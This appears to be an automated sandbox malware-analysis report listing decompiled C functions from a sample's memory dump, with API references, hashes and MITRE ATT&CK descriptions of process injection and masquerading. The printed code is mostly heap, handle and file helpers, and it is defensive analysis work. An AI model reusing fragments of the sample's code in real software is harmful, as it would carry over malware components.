0x01388311
0x01388317
0x0138831e
0x01388321
0x01388327
0x0138832a
0x0138832a
0x01388335
0x01388338
0x0138833b
0x01388344
0x0138834b
0x01388352
0x01388359
0x01388360
0x01388367
0x0138836e
0x01388375
0x0138837c
0x01388383
0x0138838a
0x01388391
0x01388398
0x0138839f
0x013883a6
0x013883ad
0x013883b4
0x013883bb
0x013883c2
0x013883c9
0x013883d0
0x013883d7
0x013883e1
0x013883eb
0x013883f5
0x013883ff
0x01388407
0x01388410
0x0138841e

APIs

memset.NTDLL ref: 01388308
memset.NTDLL ref: 013883FF
memset.NTDLL ref: 01388410

Strings

VUUU, xrefs: 01388297
VUUU, xrefs: 013882CF

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 0abbcd096af252457c2f583d44ce74b69671040b58c779890dd95c5c90c929be
Instruction ID: 059f37dd4a960b45993c847f2ba5e2b413763a35c89fb4b109b5b56765607cd4
Opcode Fuzzy Hash: 0abbcd096af252457c2f583d44ce74b69671040b58c779890dd95c5c90c929be
Instruction Fuzzy Hash: 6241B9B1610A06BBE308CF65C569782FBE4FF44708F548219D6598BB80D7BAB168CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 013899A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

_snwprintf.NTDLL ref: 013899E3
GetProcessHeap.KERNEL32(00000000,01388F37), ref: 01389A5E
HeapFree.KERNEL32(00000000), ref: 01389A65
GetProcessHeap.KERNEL32(00000000,?), ref: 01389A70
HeapFree.KERNEL32(00000000), ref: 01389A77

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: 7565d9efcec4e132807bf8e1a2cdbf7a3df8f4478dcefa0f411690b38e3557c2
Instruction ID: 4fbf78595eb8f0eea29e29d992c48a701038b30d8b33e1c8f25443771affca31
Opcode Fuzzy Hash: 7565d9efcec4e132807bf8e1a2cdbf7a3df8f4478dcefa0f411690b38e3557c2
Instruction Fuzzy Hash: 40217F71A40308BFFF20ABE0AC4AFED7B6DAB48709F201051FA09E5195D7B59A458B61

Uniqueness

Uniqueness Score: -1.00%

Function 01388AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01388AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0x138c274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0x138c274; // 0x0
				}
				_t16 = 0x138c274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x01388aa1
0x01388aaa
0x01388ab0
0x01388aba
0x01388abc
0x01388abe
0x01388ac2
0x01388ac2
0x01388ac8
0x01388acf
0x01388ad6
0x01388ae1
0x01388b1e
0x01388ae3
0x01388aed
0x01388af9
0x01388b02
0x01388b0d
0x01388b16
0x01388b16
0x01388b20
0x01388b22
0x01388b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,01389315,01389286), ref: 01388AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01388AF9
CloseHandle.KERNEL32(?), ref: 01388B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01388B0F
HeapFree.KERNEL32(00000000), ref: 01388B16

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: e486e5821af46e0cb002e7d482c56e25fabd64e10d8c512c17400b512462a83e
Instruction ID: d8981dbc9c68fa1a166c6c489d4f95a41e5fea3e5c7cc23a2fe295b72a82f22f
Opcode Fuzzy Hash: e486e5821af46e0cb002e7d482c56e25fabd64e10d8c512c17400b512462a83e
Instruction Fuzzy Hash: C0018032900720ABEB325FA8DC48B4AB7B5FF44B20F154A44FA95AB6D4C730AC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 013888B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013888B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0x138c274; // 0x0
				_t13 = __ecx;
				_t15 = 0x138c274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x013888b2
0x013888b8
0x013888bb
0x013888c2
0x013888c8
0x013888d3
0x01388910
0x013888d5
0x013888df
0x013888eb
0x013888f4
0x013888ff
0x01388908
0x01388908
0x01388912
0x01388914
0x0138891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,01388F3E), ref: 013888C8
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,01388F3E), ref: 013888EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,01388F3E), ref: 013888F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,01388F3E), ref: 01388901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,01388F3E), ref: 01388908

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 5ed8fd5031f677b45f742107be25e32d77034045b60042e6b49820772373c715
Instruction ID: 0021867b7ba3d4780b7640a87516508eeaa337327022c70df866df8049a899a9
Opcode Fuzzy Hash: 5ed8fd5031f677b45f742107be25e32d77034045b60042e6b49820772373c715
Instruction Fuzzy Hash: C1F04F35640710AFEB316FA8DC89B9A7BB9FF44711F200554F681D76A4C770AC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01381E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E01381E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0x138c238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0x138c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0x138c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x01381e57
0x01381e5c
0x01381e5f
0x01381e63
0x01381e6a
0x01381e6c
0x01381e6d
0x01381e72
0x01381e7d
0x01381f30
0x01381e83
0x01381e96
0x01381e9a
0x01381f29
0x01381ea0
0x01381ea4
0x01381eaf
0x01381ec0
0x01381ec4
0x01381ef8
0x01381f02
0x01381f0a
0x00000000
0x00000000
0x01381ec6
0x01381ec6
0x01381ec6
0x01381ecb
0x00000000
0x00000000
0x01381ed0
0x01381edb
0x01381eec
0x01381ef0
0x00000000
0x01381ef2
0x00000000
0x01381ef2
0x00000000
0x01381ef0
0x01381ef6
0x01381f0c
0x01381f12
0x01381f17
0x00000000
0x00000000
0x00000000
0x01381ef6
0x01381f19
0x01381f21
0x01381f21
0x01381e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388631), ref: 01381E89
RtlAllocateHeap.NTDLL(00000000), ref: 01381E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381EFB
HeapFree.KERNEL32(00000000), ref: 01381F02

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: fb9743e950b1a065ae134e23e0b28ab3d192234c7c9e87d3af9c394e6414831e
Instruction ID: f17a6913dfd342a7ec72f1e25df4cedf187e092f51d7ec2c07f4a2e1b161d720
Opcode Fuzzy Hash: fb9743e950b1a065ae134e23e0b28ab3d192234c7c9e87d3af9c394e6414831e
Instruction Fuzzy Hash: AE212F75A00208AFEB219F98D848FAEBBBCEB44715F140195ED09E7254D7319E11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01388420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E01388420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E013829B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x01388429
0x0138842b
0x01388433
0x01388438
0x01388460
0x01388466
0x0138846f
0x01388475
0x01388479
0x013884b1
0x0138847b
0x0138847b
0x0138848e
0x00000000
0x013884a9
0x0138849a
0x013884a8
0x013884a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 01388468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138846F

Part of subcall function 013829B0: memset.NTDLL ref: 013829C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 01388493
HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0138849A

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 5a239bb8532d7881b747e5eae86821cc2a59f0d221f6f726715f18ba2985d596
Instruction ID: 5d2dcb96fd3bf33aee8fdf226f5f8d3bc062c26c9512ad48a6f9ddb508723749
Opcode Fuzzy Hash: 5a239bb8532d7881b747e5eae86821cc2a59f0d221f6f726715f18ba2985d596
Instruction Fuzzy Hash: BD01DB33F006246BD7245BADAC4969EBB6DDBC8661F414275FD0CE7384EA218C1083E1

Uniqueness

Uniqueness Score: -1.00%

Function 013818D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013818D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0x138c7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0x138c7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0x138c7c0) != 0);
					goto L9;
				}
				L10:
			}

0x013818e8
0x013818f9
0x0138195e
0x01381967
0x013818fb
0x013818fb
0x01381900
0x01381900
0x01381900
0x01381907
0x0138190a
0x01381915
0x00000000
0x01381917
0x0138191e
0x01381927
0x01381952
0x00000000
0x00000000
0x00000000
0x00000000
0x01381929
0x0138193a
0x00000000
0x01381949
0x01381949
0x0138194f
0x0138194f
0x0138193a
0x01381927
0x00000000
0x01381954
0x01381954
0x00000000
0x01381900
0x00000000

APIs

memset.NTDLL ref: 013818E8
GetFileAttributesW.KERNEL32(?), ref: 0138191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 01381932
GetLastError.KERNEL32 ref: 0138193C

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID:
API String ID: 528582180-0
Opcode ID: c0e495dfed314229576cb5e20bb0f9f4993fbf781d2e8414b3693d19db10491c
Instruction ID: a2aa4c5ad9373089d37fc3a5cdc3298bc539dea4815dfc1136ccd651e5f573a5
Opcode Fuzzy Hash: c0e495dfed314229576cb5e20bb0f9f4993fbf781d2e8414b3693d19db10491c
Instruction Fuzzy Hash: 5501D8319003155FEB70BB68A84D7EA776CFB00718F001655F969E30C5EB74A585C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 01388B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01388B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E013819E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x01388b34
0x01388b38
0x01388b3d
0x01388b45
0x01388b50
0x01388ba3
0x01388baa
0x01388baa
0x01388b53
0x01388b56
0x01388b5a
0x01388b6e
0x01388b82
0x01388b86
0x01388b8b
0x01388b8f
0x01388b95
0x01388b9d
0x01388b9f
0x01388b9f
0x01388ba1
0x00000000
0x01388ba1
0x01388b60
0x01388b68
0x01388b6c
0x00000000
0x00000000
0x00000000
0x01388b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B75
RtlAllocateHeap.NTDLL(00000000,?,0138215D), ref: 01388B7C
lstrcpyW.KERNEL32(00000004,?), ref: 01388B8F

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: 36d1b11617d216753d3ce42e007751fd661e134dc2ef8e05e8b4141dda052a29
Instruction ID: 557b850b65c64b2c5caf77e19dfbfa9c782a1be3a260f4afa7c6b293c6cffc5d
Opcode Fuzzy Hash: 36d1b11617d216753d3ce42e007751fd661e134dc2ef8e05e8b4141dda052a29
Instruction Fuzzy Hash: A601B1716003049FDF219F69D884ACABBE8FF84744F648569FA45D7240D730E840CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013884C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013884C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E01382D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x013884c9
0x013884cc
0x013884ce
0x013884dc
0x013884e2
0x013884e6
0x0138851d
0x013884e8
0x013884fa
0x00000000
0x01388515
0x01388506
0x01388514
0x01388514

APIs

GetProcessHeap.KERNEL32(00000000,01388668,?,?,?,01388668,?), ref: 013884D5
RtlAllocateHeap.NTDLL(00000000), ref: 013884DC

Part of subcall function 01382D80: memset.NTDLL ref: 01382D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 013884FF
HeapFree.KERNEL32(00000000), ref: 01388506

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 41d74cef7781a376ac20eb51a7fa340ba4a8a2b6d4b1c29dab490d58721fca78
Instruction ID: f70dcd16a35e0d46331b2e5f6de1237c3c862c3f8fc361e2770168660edce1f0
Opcode Fuzzy Hash: 41d74cef7781a376ac20eb51a7fa340ba4a8a2b6d4b1c29dab490d58721fca78
Instruction Fuzzy Hash: 06F09636B003146BEA106BAD7C4969EFB9CDF44667F140062FE08D2204E5319D1087F1

Uniqueness

Uniqueness Score: -1.00%

Function 01381970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E01381970() {
				void* _v8;
				short _v528;
				void* _t15;

				E01381830(0x1381010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0x138c200( &_v528, 0x104, _t15, 0x138c7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x0138198d
0x01381992
0x013819a8
0x013819bb
0x013819d2

APIs

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

_snwprintf.NTDLL ref: 013819A8
GetProcessHeap.KERNEL32(00000000,01389730), ref: 013819B4
HeapFree.KERNEL32(00000000), ref: 013819BB
DeleteFileW.KERNEL32(?), ref: 013819C8

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 392a6d0cf0c035f642145efd5081708c2244e27d7c4cbd08d773cd2711f7cf6d
Instruction ID: ee187af316a1c92c2fb1ec1252414d5cb5c8fd880b0bc270b0c51f694f491095
Opcode Fuzzy Hash: 392a6d0cf0c035f642145efd5081708c2244e27d7c4cbd08d773cd2711f7cf6d
Instruction Fuzzy Hash: 92F0A0B1901318BBEE20BBA4AC4DFCF7F6CEB05319F100091FA09E2146D6305A058BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0138A750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0138A750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x138cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x138cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x0138a752
0x0138a758
0x0138a75b
0x0138a762
0x0138a768
0x0138a773
0x0138a794
0x0138a775
0x0138a777
0x0138a77c
0x0138a78c
0x0138a78c
0x0138a796
0x0138a798
0x0138a79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,01389315,00000000,0138928E), ref: 0138A768
CloseHandle.KERNEL32(?,?,00000000,01389315,00000000,0138928E), ref: 0138A77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,01389315,00000000,0138928E), ref: 0138A785
HeapFree.KERNEL32(00000000,?,00000000,01389315,00000000,0138928E), ref: 0138A78C

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: 61c92bca60be036a21e70525fa651baca76577334cd5f1d372bc261b3a52b03e
Instruction ID: 92909dbac3745b2ee3866fd91f95dd591cb7cabfe165b10ea72e706f6bc62a6f
Opcode Fuzzy Hash: 61c92bca60be036a21e70525fa651baca76577334cd5f1d372bc261b3a52b03e
Instruction Fuzzy Hash: 4FF0E536500320AFEB323B98E888AAA7BBDEF44725F180416FA42D3210C3749C40DBB0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

